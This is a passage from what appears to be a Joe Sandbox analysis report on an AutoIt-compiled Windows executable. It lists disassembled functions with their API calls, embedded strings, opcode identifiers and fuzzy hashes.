                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                            • API String ID: 3964851224-909552448
                                                            • Opcode ID: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                            • Instruction ID: c71bba753a7f1bd917c242c0c6934392373e2d2b9c77c22fb647b61f976c0516
                                                            • Opcode Fuzzy Hash: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                            • Instruction Fuzzy Hash: 96E1CB9AF4865780EA146B55E440778A3A0BF10B98FE48533F95E477D4EF3CE855C322
                                                            Function 00007FF7EC1A87CC Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 200COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$AttributesFilewcscat$wcscpy
                                                            • String ID: *.*
                                                            • API String ID: 4125642244-438819550
                                                            • Opcode ID: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                            • Instruction ID: 9029cdaee9f8dd2381fa85c2acb76df0c363ffa3ec378ae784cb759816414791
                                                            • Opcode Fuzzy Hash: 1b6dd8a96d898a21e7a73211ee0a4e3b10aba06561d9a5e90c26a3235988e558
                                                            • Instruction Fuzzy Hash: 56819EAAA18B8282EB14EF15E8407BDA3A0FB44B84FC84037EA4E47795DF7CD555C721
                                                            Function 00007FF7EC19A40C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188windowsleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                            • String ID: P
                                                            • API String ID: 1460738036-3110715001
                                                            • Opcode ID: 6e2be1337fb57673dad59794737e60112838fe0b06465b145457b8a8f464ada3
                                                            • Instruction ID: 4b6c1037902d70efa8014fbd83e833823dda387de7227392eca84a65e3f81859
                                                            • Opcode Fuzzy Hash: 6e2be1337fb57673dad59794737e60112838fe0b06465b145457b8a8f464ada3
                                                            • Instruction Fuzzy Hash: 8671FAA9B0868286F760FF28A4443BDA763FB84748F944473DA4D07695CE7CE45AC722
                                                            Function 00007FF7EC1215EC Relevance: 18.2, APIs: 12, Instructions: 191timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                            • String ID:
                                                            • API String ID: 1974058525-0
                                                            • Opcode ID: 0c1613d7862a27f9aadcde1ff47aecba04f14ac792f66c26bb2ef633a4b89113
                                                            • Instruction ID: 94659995deb9b659a2930111505a58f50d5781156edff58a9d0f8ce202475381
                                                            • Opcode Fuzzy Hash: 0c1613d7862a27f9aadcde1ff47aecba04f14ac792f66c26bb2ef633a4b89113
                                                            • Instruction Fuzzy Hash: F2912CADA19602C5EA58EF25B850778B764FF84B84FE84133D95E4B758CE3CE841D322
                                                            Function 00007FF7EC192F78 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            • Opcode ID: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                            • Instruction ID: f91de6d96b35b822f8274ec73b4b035f14df670bf98cb64fe276726bf077675b
                                                            • Opcode Fuzzy Hash: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                            • Instruction Fuzzy Hash: A96192B6B046418BE714DF69E44476CB7A2B788B89F94813ADE0993F58DF3CD905CB10
                                                            Function 00007FF7EC197E64 Relevance: 18.2, APIs: 12, Instructions: 173keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                            • Instruction ID: 40a00fcd36ec3d18fb346fa8a71ca924aa05597e9ba66b992308d94c3f386e11
                                                            • Opcode Fuzzy Hash: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                            • Instruction Fuzzy Hash: AE71B99A60C3C185FB35AB28B0403B9AB62EF45B84FD800B7D68D03695CE7DD945C772
                                                            Function 00007FF7EC1A4708 Relevance: 17.8, APIs: 3, Strings: 7, Instructions: 339COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharDriveLowerTypewcscpy
                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 1561581874-1000479233
                                                            • Opcode ID: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                            • Instruction ID: 91f2df22907dc2c7ca6c4a44ada9ca56588ae6e163bf0130e76fec87161b2a0a
                                                            • Opcode Fuzzy Hash: ce25e8d1a7becc76643e4d1ddee2007e93a86bfe4a34930367856c9c98c70219
                                                            • Instruction Fuzzy Hash: FED1F5AAA0869681EA20BB15F4403B9E3A0FF58BD4F885233DE5D53794DF3CE955C321
                                                            Function 00007FF7EC18FF44 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 243windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                            • String ID: %s%u
                                                            • API String ID: 1412819556-679674701
                                                            • Opcode ID: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                            • Instruction ID: 361fc65883c0b29e42f5dc970b38e8c537215117c98a0828f7fa89d892824653
                                                            • Opcode Fuzzy Hash: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                            • Instruction Fuzzy Hash: 23B1F5B6B0868296EB18EF29E8447F9A761FB48B84F800036CE1D47785DF3DE555C721
                                                            Function 00007FF7EC18C034 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 124registryshareCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                            • API String ID: 3030280669-22481851
                                                            • Opcode ID: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                            • Instruction ID: 5beb8c08898d453017c7efd88650b6510a190b11f381e8d3684f1030ca3d9305
                                                            • Opcode Fuzzy Hash: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                            • Instruction Fuzzy Hash: CA51B8AA618A8395EB10EB64F8907EDA7A0FF94384F800033EA4D47A69DF3CD545C751
                                                            Function 00007FF7EC1CAD1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateMessageObjectSend$AttributesCompatibleDeleteDestroyLayeredLongMovePixelSelectStock
                                                            • String ID: static
                                                            • API String ID: 3821898125-2160076837
                                                            • Opcode ID: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                            • Instruction ID: f367e737396769e53f31bb8eb7d9e1d1f3c93b025a323fe8261b0f51c3aca742
                                                            • Opcode Fuzzy Hash: 2ad0c9b06366bd18a744c10cd610a20c9196bc34b39a8e3022a1d8394ddcf546
                                                            • Instruction Fuzzy Hash: 79418EBA608781C7EB609F25F444B5AB7A1FB88791F904236EA9D43B98CF3CD444CB11
                                                            Function 00007FF7EC18C858 Relevance: 16.7, APIs: 11, Instructions: 166COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                            • String ID:
                                                            • API String ID: 1255039815-0
                                                            • Opcode ID: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                            • Instruction ID: de4c52c485655eb4b608a345c47e48b5e14327c99238598ee5c8fa889d5e1985
                                                            • Opcode Fuzzy Hash: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                            • Instruction Fuzzy Hash: 8461C2ABB0865189EB00EF65E8507AC77B4FB44B88B844037DE4E57798DF38D845C362
                                                            Function 00007FF7EC197BA0 Relevance: 16.6, APIs: 11, Instructions: 106keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                            • Instruction ID: c55508abc68313533b4490008cac6e546ed47698e8e50d58b88de3942df644db
                                                            • Opcode Fuzzy Hash: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                            • Instruction Fuzzy Hash: 4A4185A9E0C7C255FB71AB68B440379AA91EF15745F8940B7D789031C5CE3DA894C3B3
                                                            Function 00007FF7EC12E774 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 438COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7EC126838: CreateFileW.KERNELBASE ref: 00007FF7EC1268A2
                                                              • Part of subcall function 00007FF7EC144380: GetCurrentDirectoryW.KERNEL32(?,00007FF7EC12E817), ref: 00007FF7EC14439C
                                                              • Part of subcall function 00007FF7EC1256D4: GetFullPathNameW.KERNEL32(?,00007FF7EC1256C1,?,00007FF7EC127A0C,?,?,?,00007FF7EC12109E), ref: 00007FF7EC1256FF
                                                            • SetCurrentDirectoryW.KERNEL32 ref: 00007FF7EC12E8B0
                                                            • SetCurrentDirectoryW.KERNEL32 ref: 00007FF7EC12E9FA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                            • API String ID: 2207129308-1018226102
                                                            • Opcode ID: 4ff6fe4801a6e8dcbe3d0805abec616539b723cf49e4c56242313aef72532f37
                                                            • Instruction ID: 23e851475d5a25a01e432238328c70db3808f19be3026e0a83ef73d1b665653a
                                                            • Opcode Fuzzy Hash: 4ff6fe4801a6e8dcbe3d0805abec616539b723cf49e4c56242313aef72532f37
                                                            • Instruction Fuzzy Hash: 0512A0AAA0C682C6EB14FB24E4412BDE760FF85784FC05133EA4E47699DE7CD505D722
                                                            Function 00007FF7EC1B66B4 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 182comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 636576611-1287834457
                                                            • Opcode ID: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                            • Instruction ID: 487f87655b624f12782250581c58227f41be8c8088bf2ae46987618a81c172bd
                                                            • Opcode Fuzzy Hash: 8c345a5387659736622c9a6324c4ad6192b7bfb9348048406af0be26295ea1d3
                                                            • Instruction Fuzzy Hash: A0717CAAA08F46C1EB18AF26F4402BDA7B0FB54BD8B944432DE0E07765DF38E445C761
                                                            Function 00007FF7EC1B2A18 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 174networkfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: Icmp$CleanupCloseCreateEchoFileHandleSendStartupgethostbynameinet_addr
                                                            • String ID: 5$Ping
                                                            • API String ID: 1486594354-1972892582
                                                            • Opcode ID: e10d707c2ccc8c8e229b93576497dc969839fee377a1bbf9481b12c7ce409e4d
                                                            • Instruction ID: 3db984db8e8bf3f3bc2d630bc0b02942253aa38fb6ad11f029ebaaa7fd4c98df
                                                            • Opcode Fuzzy Hash: e10d707c2ccc8c8e229b93576497dc969839fee377a1bbf9481b12c7ce409e4d
                                                            • Instruction Fuzzy Hash: FE7183BAA08642C2EB14EB15E49037DB760FF84B91F818432DA5E87795CF7CE545CB22
                                                            Function 00007FF7EC1976D8 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 77windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadMessageModuleStringwprintf
                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                            • API String ID: 4007322891-4153970271
                                                            • Opcode ID: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                            • Instruction ID: 2f05a4f52471163c475d3ad6b0889480615d588a31b3240aeec0c97f60c562cc
                                                            • Opcode Fuzzy Hash: 1538dd0993c1f0be1c678023f24a10f35c888a11721d87e6110b8b553893543d
                                                            • Instruction Fuzzy Hash: F3317EBAA18A8292EB10EB14F8457A9E361FF44B84FD04033EA4D43699DF3CD515C752
                                                            Function 00007FF7EC18E1AC Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061085238.00007FF7EC214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7ec120000_cxZuGa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$ClassName
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 2573188126-1403004172
                                                            • Opcode ID: 39eb648efbb2d80ebd84a17eab69a0e81cb5d0c8019180baf925106c5b1038cd
                                                            • Instruction ID: 729c52f419f6906c872003d7c3b55f2883b1836954823dcc70404feaa9dd4463
                                                            • Opcode Fuzzy Hash: 39eb648efbb2d80ebd84a17eab69a0e81cb5d0c8019180baf925106c5b1038cd
                                                            • Instruction Fuzzy Hash: 0131E6B9A08A8181FB10AF15F8543B9E761BF89BE0F844132DA9D0779ADE3CD105C762
                                                            Function 00007FF7EC18E08C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2060925524.00007FF7EC121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EC120000, based on PE: true
                                                            • Associated: 00000000.00000002.2060890165.00007FF7EC120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061004056.00007FF7EC1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2061067436.00007FF7EC20A000.00000004.00000001.01000000.00000003.sdmpDownload File
